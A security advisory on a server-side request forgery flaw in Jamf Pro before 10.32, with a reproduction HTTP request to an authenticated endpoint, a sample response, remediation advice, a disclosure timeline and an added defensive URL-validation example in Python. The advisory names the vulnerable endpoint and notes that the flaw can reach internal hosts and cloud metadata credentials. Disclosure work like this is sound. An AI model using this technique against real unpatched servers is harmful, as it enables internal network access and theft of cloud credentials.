Research Notes
November 30, 2021

Advisory: Jamf Pro SSRF - CVE-2021-39303 & CVE-2021-40809



Jamf Pro before version 10.32 is vulnerable to a server-side request forgery (SSRF) vulnerability that allows attackers to request arbitrary URLs and read the full HTTP response for these requests. This vulnerability is only exploitable after an attacker has authenticated to the Jamf Pro instance. On cloud environments such as AWS, this poses a greater risk, as an attacker can potentially obtain AWS credentials via the metadata IP address.


An attacker can request arbitrary URLs on behalf of the Jamf Pro server. This could allow an attacker to pivot to the internal network and/or request cloud metadata endpoints to obtain cloud credentials. As Jamf Pro is often deployed on-premises within an internal network, this vulnerability exposes that internal network to authenticated Jamf Pro users.

Affected Software

Jamf Pro before version 10.32.

Product Description

Jamf Pro is an application used by system administrators to configure and automate IT administration tasks for macOS, iOS, iPadOS, and tvOS devices. Jamf offers on-premises and cloud-based mobile device management.


This vulnerability was patched in Jamf 10.32.

Please find the details about this Jamf release here:

In order to remediate this vulnerability, we recommend upgrading to the latest version of Jamf Pro on-premises.


http://yourjamfinstance:8090/eduFeatureSettingsTest.html

The following HTTP request can be made to reproduce this issue, once authenticated to Jamf:

POST /eduFeatureSettingsTest.ajax?id=0&o=r HTTP/1.1
Host: jamfpro:8080
Content-Length: 117
Accept: */*
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://re.local:8090
Referer: http://re.local:8090/legacy/eduFeatureSettingsTest.html?id=0&o=r
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

The full HTTP response for the requested URL can be found in the base64Image XML tag, from the response of the Jamf Server:

HTTP/1.1 200 
Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0
Expires: 0
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
sessionExpiresEpoch: 1800
Date: Tue, 17 Aug 2021 13:09:14 GMT
Connection: close
Content-Length: 1959

<?xml version="1.0" encoding="UTF-8"?><jss>
<ERROR_TEXT>The distribution point URL should begin with "https://"</ERROR_TEXT>

Upon decoding the Base64, the full contents of the response to the request are returned:

<!doctype html>
    <title>Example Domain</title>
... omitted for brevity ...
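The error text in the response above only rejects URLs that do not begin with "https://"; a scheme check alone does nothing to stop requests to internal hosts or the cloud metadata address. The following is an added example (not Jamf's code) that puts such a naive check beside a resolve-and-allowlist check of the kind a fetch-on-behalf-of-user feature needs. The hostnames, addresses and the FAKE_DNS table are constructed sample data so the block runs offline.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed sample resolver data so the example runs offline. A real
# implementation would use the system resolver and then connect to the
# validated address itself, since re-resolving re-opens the DNS-rebinding gap.
FAKE_DNS = {
    "dp.corp.example": ["93.184.216.34"],   # public distribution point
    "internal.corp.example": ["10.0.0.5"],  # RFC 1918 host on the internal network
}


def naive_check(url: str) -> bool:
    """The check implied by the advisory's error text: scheme prefix only."""
    return url.startswith("https://")


def resolve(host: str) -> list:
    """Return the addresses for host: IP literals as-is, names via FAKE_DNS."""
    try:
        return [str(ipaddress.ip_address(host))]
    except ValueError:
        return FAKE_DNS.get(host, [])  # unknown name: fail closed


def hardened_check(url: str) -> bool:
    """Allow only https URLs whose host resolves solely to global addresses."""
    parts = urlsplit(url)
    if parts.scheme != "https" or not parts.hostname:
        return False
    if parts.username is not None or parts.password is not None:
        return False  # userinfo in a fetch URL is never legitimate here
    addrs = resolve(parts.hostname)
    if not addrs:
        return False
    # is_global is False for RFC 1918, loopback, link-local (including the
    # 169.254.169.254 cloud metadata address), shared address space and
    # reserved/documentation ranges, for both IPv4 and IPv6.
    return all(ipaddress.ip_address(a).is_global for a in addrs)


def audit(urls):
    """Compare both checks over a batch; returns {url: (naive, hardened)}."""
    return {u: (naive_check(u), hardened_check(u)) for u in urls}
```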

Blog Post

The blog post detailing the steps taken for the discovery of this vulnerability can be found here.


Assetnote Security Research Team


  • 18/08/2021 - Reported to Jamf
  • 19/08/2021 - Initial response from Jamf
  • 24/08/2021 - CVE claimed by Jamf
  • 07/09/2021 - Jamf 10.32 released with patches for this issue
  • 01/12/2021 - Blog post published on Assetnote blog
Written by:
Shubham Shah